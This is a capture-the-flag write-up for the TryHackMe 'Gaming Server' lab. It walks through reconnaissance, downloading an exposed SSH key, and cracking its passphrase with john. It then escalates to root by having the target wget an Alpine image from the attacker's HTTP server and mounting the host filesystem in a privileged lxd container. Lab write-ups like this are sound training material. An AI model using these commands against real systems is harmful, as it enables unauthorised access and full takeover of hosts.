Hey guys! In this write up we will go through Gaming Server room on TryHackMe.
It is an easy room and we have to find the user.txt and the root.txt in order to complete it.
$ nmap -A -T4 -p- -vv -oN Ascan <Target IP> $ cat Ascan | grep tcp 22/tcp open ssh syn-ack OpenSSH 7.6p1 80/tcp open http syn-ack Apache httpd 2.4.29
Ok, we have only 2 services:
SSH on port 22 HTTP on port 80
Start gobuster and take a look at the HTTP service:
$ gobuster dir -w /usr/share/wordlists/dirbuster/dirmedium.txt -u <Target IP> -t40
By playing a little bit with the website I can’t find anything useful. But if we look at the homepage source, we can spot a possible username from a comment.
From the gobuster we retrieve some useful resources:
$ gobuster dir -w /usr/share/wordlists/dirbuster/dirmedium.txt -u <Target IP> -t40 /uploads (Status: 301) /secret (Status: 301) /server-status (Status: 403)
Let’s take a look at uploads and secret.
Inside upload we have something that looks like a dictionary and we definitely have to grab it, it could be useful. The manifesto and the meme don’t seem to be interesting.
$ wget http://<Target IP>/uploads/dict.lst
Bingo! Inside the secret folder we have a private key, grab it on your attack machine!
$ wget http://<Target IP>/secret/secretKey
Maybe we can log in to the SSH service. In order to use the private key as identification file, we have to change the permission on it:
$ chmod 400 secretKey $ ssh -i secretKey john@<Target IP>
Unfortunately, we can’t login as we need to input a passphrase. This should not be a problem, maybe we can use john with the dictionary found inside the uploads folder to crack it. Let’s check it.
$ python /usr/share/john/ssh2john.py secretKey > sec.hash $ john --wordlist=dic sec.hash
Thank you John! Now we can log in! Hello there!
Once inside let’s start check what we have and what we can do..
Inside the john’s home directory there is the user flag.
$ john@exploitable:~$ ls user.txt
Let’s get the root now.
john@exploitable:~$ id uid=1000(john) gid=1000(john) groups=1000(john),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
As we can see john is in the lxd group. We can use this to escalate our privileges. To do so I suggest you to read this post from Hacking Articles.
Let’s do it. On our attack machine let’s bring an image to mount and start an HTTP server so we can wget it from the target machine:
$ git clone https://github.com/saghul/lxd-alpine-builder.git $ cd lxd-alpine-builder $ ./build-alpine $ python3 -m http.server
Let’s go back on the target machine:
john@exploitable:~$ cd /tmp john@exploitable:~$ wget http://<Your IP>/imagefilename.tar.gz
Now add the image, then check if there is:
john@exploitable:~$ lxc image import ./imagefilename.tar.gz --alias myimage john@exploitable:~$ lxc image list
And it’s there! Awesome.
john@exploitable:~$ lxc init myimage ignite -c security.privileged=true john@exploitable:~$ lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true john@exploitable:~$ lxc start ignite john@exploitable:~$ lxc exec ignite /bin/sh ~ # id uid=0(root) gid=0(root) ~ #
To grab the root.txt we have to go in the mounted path: /mnt/root/root
~ # cd /mnt/root/root /mnt/root/root # ls root.txt
Very straightforward easy box. I’ve already find this kind of privesc in another room and I think that all the container universe is very interesting for this purposes.
Hope that someone could find this useful and enjoyable.